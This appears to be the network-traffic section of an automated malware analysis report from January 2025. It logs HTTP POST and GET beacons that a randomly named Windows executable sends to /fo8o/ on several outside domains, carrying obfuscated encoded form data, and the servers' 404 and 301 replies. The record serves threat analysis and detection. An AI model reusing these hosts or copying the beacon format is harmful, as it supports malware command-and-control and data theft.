                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 237
                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 72 47 2b 4b 34 7a 52 66 6d 4a 39 4a 4c 78 4a 49 30 76 6e 72 37 74 6d 63 54 68 61 35 54 4d 6d 2f 61 58 70 78 52 76 58 56 35 58 67 67 3d 3d
                                                                                  Data Ascii: pnGX8L3p=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxrG+K4zRfmJ9JLxJI0vnr7tmcTha5TMm/aXpxRvXV5Xgg==
                                                                                  Jan 15, 2025 08:31:14.503432989 CET367INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 15 Jan 2025 07:31:14 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.649923195.110.124.133803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:31:16.414741993 CET1845OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1249
                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 71 5a 30 32 56 74 57 4b 45 6d 4a 69 66 2f 6c 61 30 52 55 6f 71 73 39 59 75 50 4b 61 30 34 35 6f 58 44 76 4a 72 39 54 6f 4b 68 32 75 48 2b 75 48 5a 35 5a 30 73 63 30 74 4a 6f 45 30 54 52 4e 30 57 76 70 65 68 41 6a 6e 6c 71 37 46 73 4f 59 46 71 62 54 36 47 39 65 70 54 43 41 32 44 30 2b 48 4f 52 30 2f 61 35 73 62 33 65 54 58 39 46 58 6d 53 30 46 41 37 63 52 76 47 69 43 72 6e 69 79 61 79 78 6a 59 54 77 75 42 64 6d 69 42 56 62 6c 74 6d 7a 6b 6f 59 76 2f 6b 74 6a 34 2b 54 42 6a [TRUNCATED]
                                                                                  Data Ascii: pnGX8L3p=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIMqZ02VtWKEmJif/la0RUoqs9YuPKa045oXDvJr9ToKh2uH+uHZ5Z0sc0tJoE0TRN0WvpehAjnlq7FsOYFqbT6G9epTCA2D0+HOR0/a5sb3eTX9FXmS0FA7cRvGiCrniyayxjYTwuBdmiBVbltmzkoYv/ktj4+TBjekFpdHNzeNHxy9Pcw24vdDItt+e8WTbZ9URuazYWsp568/f0yKCjRfcltj/CA1fR61rMc9wdk4KaradY6Pdc7076uQy+eLO0Q7KYt/TQgmZS3EbjuUCmO3rbsQ1pg9d4mkADNwjYqc53IOT7JXCtaQXK99mv+mn+8LZPNINpu+Qxsl1QHCywTU7xudlwhT8JJRRErNA2xxuNbLuFFABdhBU1HJ7stU7WFTyLLMWe48zP3XOe1lGfqBSFn9lU+mJOWFkDenbEMP2uzR6vx3qmt02agNXgQMf433nniF72arU/+HzfMx3jHkODTNmUud0+TuZwgo8waZmP+Lk5pBsgRWXcZ3Sbk0ZdOcgtB9mqWbW8TV3q2k+2jaWmoHGYnEgXqbQpn9V6ujEY+nrii6iZI3iPk9fxDRDpw02r9pwl7b0gP/uQMCVDbXc8focD0by28eXd4VXTGobiMOnUYVo4z2TFUUFP+aM/5oOhDjlxawgNSNEHkwsgBuyeOrKEXNOhnzk6R0jzAkXvJCu5eMpVQV3ari5ZVVbWHpxc+q1ZKrPTWm5T9YSJR1aNzgCyM/vpEdo39GOX49YKRPj1lUtwqc6YNKe3Bp+KVtkNYcP6JmvgTk0HTczTJZunfRUgRAQjzoxmITZTBJgAFKZjg0Bv8ZGbFgEA1eLCJA [TRUNCATED]
                                                                                  Jan 15, 2025 08:31:17.091588974 CET367INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 15 Jan 2025 07:31:16 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.649924195.110.124.133803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:31:18.985902071 CET539OUTGET /fo8o/?pnGX8L3p=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Jan 15, 2025 08:31:19.662909985 CET367INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 15 Jan 2025 07:31:19 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.649925217.196.55.202803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:31:41.058429003 CET796OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.empowermedeco.com
                                                                                  Origin: http://www.empowermedeco.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 213
                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 38 31 6e 69 65 69 33 71 4c 44 64 43 47 51 39 4a 6a 50 7a 58 78 74 43 69 79 75 77 63 71 4c 41 38 34 43 6e 30 58 4c 33 30 77 61 6f
                                                                                  Data Ascii: pnGX8L3p=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Ju81niei3qLDdCGQ9JjPzXxtCiyuwcqLA84Cn0XL30wao
                                                                                  Jan 15, 2025 08:31:41.615114927 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Wed, 15 Jan 2025 07:31:41 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.649926217.196.55.202803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:31:43.602781057 CET820OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.empowermedeco.com
                                                                                  Origin: http://www.empowermedeco.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 237
                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4e 41 69 77 32 43 63 4b 4c 71 2b 34 36 6e 6d 41 48 51 37 45 2f 4c 4f 36 6f 41 59 6c 4c 6a 33 79 6c 39 71 4b 30 42 4e 36 37 55 32 67 3d 3d
                                                                                  Data Ascii: pnGX8L3p=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhNAiw2CcKLq+46nmAHQ7E/LO6oAYlLj3yl9qK0BN67U2g==
                                                                                  Jan 15, 2025 08:31:44.177155972 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Wed, 15 Jan 2025 07:31:44 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.649928217.196.55.202803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:31:46.142512083 CET1833OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.empowermedeco.com
                                                                                  Origin: http://www.empowermedeco.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1249
                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 70 6e 47 58 38 4c 33 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 66 6b 50 46 73 68 4a 77 48 57 61 48 4e 6e 79 33 44 6b 63 50 7a 63 2f 49 66 47 6e 42 37 32 7a 51 6a 57 4b 61 30 72 65 54 79 34 77 45 73 63 6b 71 41 54 48 37 75 4b 6c 42 6c 74 2b 35 54 38 46 65 47 6e 49 44 48 68 47 6a 4c 68 51 43 76 52 77 68 48 65 4d 74 49 51 4c 6f 31 75 6c 46 64 50 6d 2f 57 5a 6a 77 66 67 33 70 58 4c 71 4a 7a 4c 36 75 5a 6b 2f 68 53 68 4b 38 37 4a 2f 42 38 4e 6d 64 4e 76 45 72 53 51 6b 75 66 4c 38 68 42 41 36 7a 6a 45 68 79 49 36 76 47 75 55 67 48 32 73 38 [TRUNCATED]
                                                                                  Data Ascii: pnGX8L3p=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZfkPFshJwHWaHNny3DkcPzc/IfGnB72zQjWKa0reTy4wEsckqATH7uKlBlt+5T8FeGnIDHhGjLhQCvRwhHeMtIQLo1ulFdPm/WZjwfg3pXLqJzL6uZk/hShK87J/B8NmdNvErSQkufL8hBA6zjEhyI6vGuUgH2s81XeVIDixDbnWIPixe5THOj1QX8Q7yqPkkxjHAxt+ggpiweeAg1wP76LC37rf6GaI5SASvonDhKMK42ZwjLnYCbzLpsDW6+lxtNU6KY0OpSMOyB9tpQUYABR2tO6zcGqRGhFeO8cDb871WKvJV2kIu8VmqYNpIfCSiLUB5tW18VukjKiTAT7SvDARlAZmM0B+L75MyEmXDWkRWxGyClElMITMefbC5NclUvpHwjCf5SM9zzt5tJPtM0o1agCyknjpzI9xq3HAAA9jzk4FKj9oqhUy45KY9s0VPu1RhxhCqTNJI/dYagWk4FoKQ6BMS1OfaNmEP6uVrKjJxiAFwbDOxuZpDRHEcxj4G0SAJ1uVgAfCJvJHZYLtd1wAQFg38hf2B+nsFLyyyOVDGnIfV3zC2fBe2ciH0I0iu4z1N5LddlXlYO6opVxpgLUoopx/pcLClB0CCHpLHlubs768Rp8skFn3/HEWJWZos8nnOPkJnv/DI8jCepFOpl5f5jTCTMFNnHQpyZSCLexonbe5T720PRkZoL1kkMlqK9qSkj3hhJj8P5IdVmldOFK+glMDimMQZOUx5VUGBjfJmbPiUI4HXHsFqq6rYOi2fmLAv6Ut1BwpcdBlY6iYLPL6ryNaK2eSEtNnpR7x0AcHqDGyh0viGZGuVzAxcwL2Y0 [TRUNCATED]
                                                                                  Jan 15, 2025 08:31:46.699182034 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Wed, 15 Jan 2025 07:31:46 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
